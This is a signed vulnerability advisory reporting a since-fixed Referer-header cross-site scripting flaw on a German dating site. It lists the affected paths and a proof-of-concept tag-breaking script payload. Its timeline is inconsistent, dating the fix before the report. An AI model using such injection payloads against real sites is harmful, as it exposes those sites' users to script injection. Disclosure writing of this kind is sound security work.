The www.elitepartner.de site suffers from a REFERER-based cross site scripting vulnerability.
3a5739370ac00677e8ce70c188395bb7f6a1ccc2940c8c4135b13a056e87a498
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Advisory: www.elitepartner.de - Cross-site Scripting vulnerability
Advisory ID: SSCHADV2012-024
Author: Stefan Schurtz
Affected Software: Successfully tested on www.elitepartner.de
Vendor URL: http://www.elitepartner.de
Vendor Status: fixed
==========================
Vulnerability Description
==========================
http://www.elitepartner.de is prone to a XSS vulnerability
==========================
PoC-Exploit
==========================
http://www.elitepartner.de/km/gfx/starthomepage/
http://www.elitepartner.de/km/static/js/jquery/
http://www.elitepartner.de/km/gfx/
http://www.elitepartner.de/km/static/
http://www.elitepartner.de/km/js/
http://www.elitepartner.de/km/static/js/omniture/
http://www.elitepartner.de/km/static/js/
Referer: '"></style></script><script>alert(/huh/)</script>
==========================
Solution
==========================
fixed
==========================
Disclosure Timeline
==========================
23-Dec-2012 - informed by contact form
10-Jan-2012 - fixed by developer
==========================
Credits
==========================
Vulnerability found and advisory written by Stefan Schurtz.
==========================
References
==========================
http://www.darksecurity.de/advisories/2012/SSCHADV2012-024.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (MingW32)
Comment: Thunderbird-Portable 3.1.20 by GnuPT - Gnu Privacy Tools
Comment: Download at: http://thunderbird.gnupt.de
iEYEARECAAYFAlDvDJQACgkQg3svV2LcbMAcOQCeLfeDdv3GZSCIR3N5XWfzfNzr
TuoAnieTg9xWXLpCkCtWe0J/A5nua7Po
=9YP0
-----END PGP SIGNATURE-----